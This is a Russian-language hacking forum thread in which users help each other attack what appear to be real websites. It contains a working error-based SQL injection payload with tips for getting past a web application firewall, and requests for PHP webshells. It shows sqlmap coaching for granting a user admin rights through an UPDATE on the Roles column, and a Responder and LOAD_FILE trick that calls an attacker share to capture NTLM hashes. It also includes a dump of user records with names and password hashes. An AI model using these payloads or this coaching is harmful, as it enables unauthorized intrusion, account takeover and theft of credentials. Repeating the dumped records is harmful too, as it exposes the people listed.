[web-hacking] Ваши вопросы

[c0d3x]

реальный ип уже нашёл и все манипуляции проводил указывая его как host , не знаешь почему нет разницы в ответах ? акунетикс же как то смог отличить true от false

Ну скинь в личку всю х#йню, все запросы и ответы из окуня и сам таргет. Иначе непонятно что там за ебатория и гадать будем все вместе еще год.

 

[kosh_e4ka]

Подскажите пожалуйста у престы по дефолту где админка? Если нет дефолта подскажите как ее искать у них

 

[kosh_e4ka]

реальный ип уже нашёл и все манипуляции проводил указывая его как host , не знаешь почему нет разницы в ответах ? акунетикс же как то смог отличить true от false

если тебе просто админа найти через -C admin --search или -T admin --search с таймом и не насилуй свой мозг с этим булиан

 

[kosh_e4ka]

DB: mysql
Type: error based sqli
Working payload: UPDATEXML(2883, CONCAT(0x2e, (select @@version )), 9032)
MySQL Query : SELECT `catid`,`url`,`thumb`,`title`,`stars`,`copytype`,`filesize2` FROM `qwe`.`v9_download` WHERE status=99 and is_hide!=1 and catid in (UPDATEXML(2883, CONCAT(0x2e, (select @@version )), 9032)) and lianwang=2 and classtype like '%,1,%' ORDER BY down_num desc LIMIT 50/* /index.php?a=sj_xzph_ajax&app_classtype=1&c=index&catid=UPDATEXML(2883,%20CONCAT(0x2e,%20(select%20@@version%20)),%209032)&lianwang=2&m=content&pc_hash=WrCDxe */
MySQL Error : XPATH syntax error: '5.6.48-log'
MySQL Errno : 1105
Message : XPATH syntax error: '5.6.48-log'



я знаю, что там есть таблицы v9_admin мне надо оттуда вывести нужные мне данные колонки, но есть проблема, то, что SELECT username FROM v9_admin - банит вафка)


UPDATEXML(2883, CONCAT(0x2e, (select @@version from dual )), 9032) = block


网站防火墙
ответ вафки
您的请求带有不合法参数，已被网站管理员设置拦截！


важно заметить что, когда выпадает select либо from, вафка пропускает((
UPDATEXML(2883, CONCAT(0x2e, ( @@version from dual )), 9032)

--tamper=lowercase если еще актуально

 

[kosh_e4ka]

Подскажите пожалуйста у престы по дефолту где админка? Если нет дефолта подскажите как ее искать у них

А также, как дефолтно таблица их админов в бд называется?

 

[annutua]

--tamper=lowercase если еще актуально

hello ,bro.do you know something about .php webshells .. like this ..php shells

hello bro,,,do you know something about .php webshells ..

 

[annutua]

hello ,bro.do you know something about .php webshells .. like this ..php shells
Посмотреть вложение 102794
hello bro,,,do you know something about .php webshells ..

DB: mysql
Type: error based sqli
Working payload: UPDATEXML(2883, CONCAT(0x2e, (select @@version )), 9032)
MySQL Query : SELECT `catid`,`url`,`thumb`,`title`,`stars`,`copytype`,`filesize2` FROM `qwe`.`v9_download` WHERE status=99 and is_hide!=1 and catid in (UPDATEXML(2883, CONCAT(0x2e, (select @@version )), 9032)) and lianwang=2 and classtype like '%,1,%' ORDER BY down_num desc LIMIT 50/* /index.php?a=sj_xzph_ajax&app_classtype=1&c=index&catid=UPDATEXML(2883,%20CONCAT(0x2e,%20(select%20@@version%20)),%209032)&lianwang=2&m=content&pc_hash=WrCDxe */
MySQL Error : XPATH syntax error: '5.6.48-log'
MySQL Errno : 1105
Message : XPATH syntax error: '5.6.48-log'



я знаю, что там есть таблицы v9_admin мне надо оттуда вывести нужные мне данные колонки, но есть проблема, то, что SELECT username FROM v9_admin - банит вафка)


UPDATEXML(2883, CONCAT(0x2e, (select @@version from dual )), 9032) = block


网站防火墙
ответ вафки
您的请求带有不合法参数，已被网站管理员设置拦截！


важно заметить что, когда выпадает select либо from, вафка пропускает((
UPDATEXML(2883, CONCAT(0x2e, ( @@version from dual )), 9032)

bro.. if you have webshells ,,msg me here

 

[annutua]

DB: mysql
Type: error based sqli
Working payload: UPDATEXML(2883, CONCAT(0x2e, (select @@version )), 9032)
MySQL Query : SELECT `catid`,`url`,`thumb`,`title`,`stars`,`copytype`,`filesize2` FROM `qwe`.`v9_download` WHERE status=99 and is_hide!=1 and catid in (UPDATEXML(2883, CONCAT(0x2e, (select @@version )), 9032)) and lianwang=2 and classtype like '%,1,%' ORDER BY down_num desc LIMIT 50/* /index.php?a=sj_xzph_ajax&app_classtype=1&c=index&catid=UPDATEXML(2883,%20CONCAT(0x2e,%20(select%20@@version%20)),%209032)&lianwang=2&m=content&pc_hash=WrCDxe */
MySQL Error : XPATH syntax error: '5.6.48-log'
MySQL Errno : 1105
Message : XPATH syntax error: '5.6.48-log'



я знаю, что там есть таблицы v9_admin мне надо оттуда вывести нужные мне данные колонки, но есть проблема, то, что SELECT username FROM v9_admin - банит вафка)


UPDATEXML(2883, CONCAT(0x2e, (select @@version from dual )), 9032) = block


网站防火墙
ответ вафки
您的请求带有不合法参数，已被网站管理员设置拦截！


важно заметить что, когда выпадает select либо from, вафка пропускает((
UPDATEXML(2883, CONCAT(0x2e, ( @@version from dual )), 9032)

wordpress /webshells

 

[m4dbyt3]

какой командой с помощью sqlmap используя UPDATE поменять пароль юзеру с именем Джо Байден?

 

[c0d3x]

какой командой с помощью sqlmap используя UPDATE поменять пароль юзеру с именем Джо Байден?

--sql-query=

UPDATE users SET password = '12345' WHERE id = 1;

 

[m4dbyt3]

--sql-query=

UPDATE users SET password = '12345' WHERE id = 1;

сделал и получил ответ что не поддерживается stacked queries (
есть вот такие права , можно как-то своего админа создать ?

[01:44:34] [INFO] retrieved: SELECT           
[01:44:35] [INFO] retrieved: INSERT           
[01:44:36] [INFO] retrieved: UPDATE           
[01:44:37] [INFO] retrieved: DELETE           
[01:44:38] [INFO] retrieved: CREATE           
[01:44:39] [INFO] retrieved: DROP           
[01:44:40] [INFO] retrieved: RELOAD           
[01:44:42] [INFO] retrieved: PROCESS           
[01:44:42] [INFO] retrieved: FILE           
[01:44:44] [INFO] retrieved: REFERENCES             
[01:44:45] [INFO] retrieved: INDEX           
[01:44:46] [INFO] retrieved: ALTER           
[01:44:47] [INFO] retrieved: SUPER           
[01:44:50] [INFO] retrieved: CREATE TEMPORARY TABLES             
[01:44:52] [INFO] retrieved: LOCK TABLES             
[01:44:53] [INFO] retrieved: EXECUTE           
[01:44:54] [INFO] retrieved: CREATE VIEW             
[01:44:56] [INFO] retrieved: SHOW VIEW           
[01:45:00] [INFO] retrieved: CREATE ROUTINE             
[01:45:02] [INFO] retrieved: ALTER ROUTINE             
[01:45:03] [INFO] retrieved: EVENT           
[01:45:05] [INFO] retrieved: TRIGGER

 

[c0d3x]

сделал и получил ответ что не поддерживается stacked queries (
есть вот такие права , можно как-то своего админа создать ?

[01:44:34] [INFO] retrieved: SELECT         
[01:44:35] [INFO] retrieved: INSERT         
[01:44:36] [INFO] retrieved: UPDATE         
[01:44:37] [INFO] retrieved: DELETE         
[01:44:38] [INFO] retrieved: CREATE         
[01:44:39] [INFO] retrieved: DROP         
[01:44:40] [INFO] retrieved: RELOAD         
[01:44:42] [INFO] retrieved: PROCESS         
[01:44:42] [INFO] retrieved: FILE         
[01:44:44] [INFO] retrieved: REFERENCES           
[01:44:45] [INFO] retrieved: INDEX         
[01:44:46] [INFO] retrieved: ALTER         
[01:44:47] [INFO] retrieved: SUPER         
[01:44:50] [INFO] retrieved: CREATE TEMPORARY TABLES           
[01:44:52] [INFO] retrieved: LOCK TABLES           
[01:44:53] [INFO] retrieved: EXECUTE         
[01:44:54] [INFO] retrieved: CREATE VIEW           
[01:44:56] [INFO] retrieved: SHOW VIEW         
[01:45:00] [INFO] retrieved: CREATE ROUTINE           
[01:45:02] [INFO] retrieved: ALTER ROUTINE           
[01:45:03] [INFO] retrieved: EVENT         
[01:45:05] [INFO] retrieved: TRIGGER

Это больше похоже на ответ на команду --privileges, и права судя по всему есть вообще на все. Покажи как выглядит таблица с юзерами, какие колонки там? Что за цмс вообще?

 

[m4dbyt3]

Это больше похоже на ответ на команду --privileges, и права судя по всему есть вообще на все. Покажи как выглядит таблица с юзерами, какие колонки там? Что за цмс вообще?

да это он и есть (ответ на --privileges), разве не так права смотреть?
cms похоже какая-то самописная ,хостится на win сервере

Table: user
[77 columns]
+-----------------+------------------+
| Column | Type |
+-----------------+------------------+
| Group | varchar(45) |
| AccountCode | varchar(10) |
| affiliateorg | int(11) |
| Alias | varchar(40) |
| author | int(11) |
| avatar | int(10) unsigned |
| avatarpath | varchar(45) |
| betauth | int(10) unsigned |
| clientid | text |
| Contact | varchar(35) |
| Country | varchar(5) |
| createsource | varchar(10) |
| defaultracetype | varchar(5) |
| dispalias | int(10) unsigned |
| dispname | int(10) unsigned |
| DOB | date |
| email | varchar(100) |
| facebook | varchar(250) |
| faicon | varchar(15) |
| Firstname | varchar(45) |
| freetips | int(11) |
| Gender | varchar(5) |
| GTOWebpage | text |
| instagram | varchar(150) |
| IsActive | tinyint(1) |
| isloggedin | int(10) |
| JoinDate | datetime |
| lastaction | datetime |
| LastLogin | datetime |
| Latemail | int(10) unsigned |
| loginattempt | int(10) unsigned |
| media | int(11) |
| Mobile | varchar(20) |
| MobileTip | varchar(2) |
| multipleemail | int(10) |
| network | int(11) |
| NewsLetter | int(10) unsigned |
| Password | text |
| Postcode | varchar(20) |
| premium | int(11) |
| protipper | int(10) unsigned |
| proweb | int(10) unsigned |
| PuntActive | int(11) |
| PuntEmailNotify | int(11) |
| PuntSMSNotify | int(11) |
| pushcrewID | varchar(45) |
| RemComp | int(10) unsigned |
| RemTipsDue | int(10) unsigned |
| Roles | varchar(20) |
| showlogo | int(11) |
| showstats | int(11) |
| sitetype | varchar(2) |
| siteview | varchar(10) |
| State | varchar(25) |
| StNumber | varchar(45) |
| Street | varchar(45) |
| streettype | varchar(45) |
| Suburb | varchar(45) |
| Surname | varchar(45) |
| Tactics | varchar(45) |
| TC | varchar(1) |
| TempID | varchar(45) |
| timezone | int(10) unsigned |
| TipsNotShow | int(10) unsigned |
| token | text |
| tokencreate | datetime |
| tokenexpire | datetime |
| twitterid | varchar(65) |
| unit | varchar(45) |
| UserID | int(10) unsigned |
| validatedemail | int(11) |
| validatedmobile | int(11) |
| webpage | text |
| webstage | int(10) unsigned |

 

[c0d3x]

да это он и есть (ответ на --privileges), разве не так права смотреть?
cms похоже какая-то самописная ,хостится на win сервере

Дамп первых 5-10 юзеров сделай, надо понять как в БД выглядит админский акк. Возможно за привилегии отвечает колонка Group или Roles. После чего найти свой акк и апдейтнуть у него эту колонку подставив значение админа, например так:

UPDATE user SET Roles = 'admin' WHERE id = 12345;

Где id - id твоего юзера. Возможно вместо id надо будет юзать UserID.

 

[m4dbyt3]

Дамп первых 5-10 юзеров сделай, надо понять как в БД выглядит админский акк. Возможно за привилегии отвечает колонка Group или Roles. После чего найти свой акк и апдейтнуть у него эту колонку подставив значение админа, например так:

UPDATE user SET Roles = 'admin' WHERE id = 12345;

Где id - id твоего юзера. Возможно вместо id надо будет юзать UserID.

За привилегии отвечает колонка Roles , проверил по своей созданной учетке стоит - User , так-же вытащил учетки админов
сдампил 5 юзеров , вот так это выглядит . странно что пусто в колонке Roles
вчера пробовал поменять пасс своему юзеру вот такой командой --sql-query "UPDATE user SET password='CB5F1385C868DB81E20BB0FCFD6D6DBC' WHERE email='vasa@vasa'" - была ошибка stacked queries
сегодня пробовал вот так --sql-query UPDATE user SET Roles = 'Admin' WHERE id = 137818; (UserId тоже)

получаю такую ошибку - [WARNING] unexpected HTTP code '302' detected. Will use (extra) validation step in similar cases

------+-----------------+-----------------+
| | 40937 | 26740533:75a58af3f786e82f-3A38D563-CCD1-4CDB-5B088D44B22F1727 | 0 | | | | | | Brett Milley | PROTIP | NSW | | 1 | | M | 0000000000 | | | 0 | 0 | newspaper-o | 14 | 0 | | 1 | Milley | | Telegraph Race | 1 | 0 | 0 | | 1 | 2017-01-07 00:00:00 | 0 | AF9D38EEEB91F1B3CA9C613F056DD46C | | | 1 | | 0 | 1 | 0 | N | GTO | 54 | 3 | Brett | | | 1 | | 0 | 1 | | 1 | | 1 | avatar-racing.jpg | 0 | 2000-01-01 09:00:00 | 1 | | News | 0 | 2000-01-01 09:00:00 | 2000-01-01 09:00:00 | | GTO | 3 | 0 | 0 | 0 | 0 | R | 0 |
| | 49731 | 26740533:75a58af3f786e82f-3A38D563-CCD1-4CDB-5B088D44B22F1727 | 0 | | | | | | Mark Geyer | PROTIP | NSW | -.com | 1 | | M | | | | 0 | 0 | microphone | 14 | | AU | 0 | Geyer | Sports:NL | Triple M | 1 | 0 | 0 | | 1 | 2018-02-07 09:27:40 | 0 | AF9D38EEEB91F1B3CA9C613F056DD46C | | | 1 | | 0 | 1 | 0 | N | GTO | 54 | 0 | Mark | 2017-04-28 10:30:11 | | 1 | | 0 | 1 | | 0 | | 0 | Mark-Geyer.png | 0 | 2000-01-01 09:00:00 | 1 | | Radio | 0 | 2000-01-01 09:00:00 | 2000-01-01 09:00:00 | | GTO | 3 | 0 | 0 | 1 | 1 | R | 0 |
| | 52372 | 26740533:75a58af3f786e82f-3A38D563-CCD1-4CDB-5B088D44B22F1727 | 0 | | | | 2034-06-28 | | Blake Dunstan | PROTIP | VIC | -.com | 1 | | M | 0000000000 | | | 0 | 0 | newspaper-o | 14 | 0 | AU | 0 | Dunstan | | Telegraph Race | 1 | 0 | 0 | | 1 | 2018-04-16 00:00:00 | 0 | AF9D38EEEB91F1B3CA9C613F056DD46C | 3000 | | 1 | | 0 | 1 | 0 | N | GTO | 54 | 3 | Blake | | | 1 | | 0 | 1 | | 0 | | 0 | avatar-racing.jpg | 0 | 2000-01-01 09:00:00 | 1 | | News | 0 | 2000-01-01 09:00:00 | 2000-01-01 09:00:00 | | GTO | 3 | 0 | 0 | 0 | 0 | R | 0 |
| | 52372 | 26740533:75a58af3f786e82f-3A38D563-CCD1-4CDB-5B088D44B22F1727 | 0 | | | | 2034-06-28 | | Blake Dunstan | PROTIP | VIC | -.com | 1 | | M | 0000000000 | | | 0 | 0 | newspaper-o | 14 | 0 | AU | 0 | Dunstan | | Telegraph Race | 1 | 0 | 0 | | 1 | 2018-04-16 00:00:00 | 0 | AF9D38EEEB91F1B3CA9C613F056DD46C | 3000 | | 1 | | 0 | 1 | 0 | N | GTO | 54 | 3 | Blake | | | 1 | | 0 | 1 | | 0 | | 0 | avatar-racing.jpg | 0 | 2000-01-01 09:00:00 | 1 | | News | 0 | 2000-01-01 09:00:00 | 2000-01-01 09:00:00 | | GTO | 3 | 0 | 0 | 0 | 0 | R | 0 |
| | 52671 | 26740533:75a58af3f786e82f-3A38D563-CCD1-4CDB-5B088D44B22F1727 | 0 | | | | 1980-01-01 | | Steve Renouf | PROTIP | NSW | -.com | 1 | | M | | | | 0 | 0 | laptop | 14 | | AU | 0 | Renouf | Sports:NL | Telegraph | 1 | 0 | 0 | | 1 | 2018-02-07 09:27:40 | 0 | AF9D38EEEB91F1B3CA9C613F056DD46C | | | 1 | | 0 | 1 | 0 | N | GTO | 54 | 0 | Steve | | | 1 | | 0 | 1 | | 0 | 0 | 0 | Steve-Renouf.png | 0 | 2000-01-01 09:00:00 | 1 | | Website | 0 | 2000-01-01 09:00:00 | 2000-01-01 09:00:00 | | GTO | 3 | 0 | 0 | 1 | 1 | R | 0 |
+--------+-

 

[c0d3x]

За привилегии отвечает колонка Roles , проверил по своей созданной учетке стоит - User , так-же вытащил учетки админов
сдампил 5 юзеров , вот так это выглядит . странно что пусто в колонке Roles
вчера пробовал поменять пасс своему юзеру вот такой командой --sql-query "UPDATE user SET password='CB5F1385C868DB81E20BB0FCFD6D6DBC' WHERE email='vasa@vasa'" - была ошибка stacked queries
сегодня пробовал вот так --sql-query UPDATE user SET Roles = 'Admin' WHERE id = 137818; (UserId тоже)

получаю такую ошибку - [WARNING] unexpected HTTP code '302' detected. Will use (extra) validation step in similar cases

Мап stacked queries вектор вообще определяет или нет? Здесь уже сложно говорить в чем проблема не видя таргета. Иногда инсерт/апдейт не работает из-за кук, иногда из-за того что редирект не фолловится, иногда из-за синтаксических ошибок. Можешь скинуть мне в личку данные, я поковыряю.

 

[xargs]

сделал и получил ответ что не поддерживается stacked queries (
есть вот такие права , можно как-то своего админа создать ?

Нельзя, если у вас запрос SELECT и нет stacked то как вы собрались делать UPDATE/INSERT.
stacked - в MySQL/Maria не частое явление.
Нужно искать в другом месте инжект, желательно в полях где информация потенциально обновляется - адрес, ник, пароль, интересы итд.

хостится на win сервере

responder -I eth0
SELECT LOAD_FILE('\\\\attacker\\share\\payload.txt');

Если сервер MySQL запущен под учетной записью с сетевыми привилегиями, Windows отправит аутентификацию NTLM

 

[m4dbyt3]

Нельзя, если у вас запрос SELECT и нет stacked то как вы собрались делать UPDATE/INSERT.
stacked - в MySQL/Maria не частое явление.
Нужно искать в другом месте инжект, желательно в полях где информация потенциально обновляется - адрес, ник, пароль, интересы итд.


responder -I eth0
SELECT LOAD_FILE('\\\\attacker\\share\\payload.txt');

Если сервер MySQL запущен под учетной записью с сетевыми привилегиями, Windows отправит аутентификацию NTLM

Не могу нагуглить как в моем случае пользоваться Респондером,я так понял он(Респондер) имеет встроенный SMB сервер,но как там создать доступную для всех шару и как сгенерировать payload.txt не понял
мог бы подсказать ?

 

[xargs]

мог бы подсказать ?

Могу подсказать то что тебе нужно немного погуглить, немного почитать справку по софту и у тебя все получится. Там предельно все просто, без особых специфических конфигураций.

 

[conqqert]

Может кто сказать больше про старые уязвы?
CVE-2011-4969
CVE-2012-6708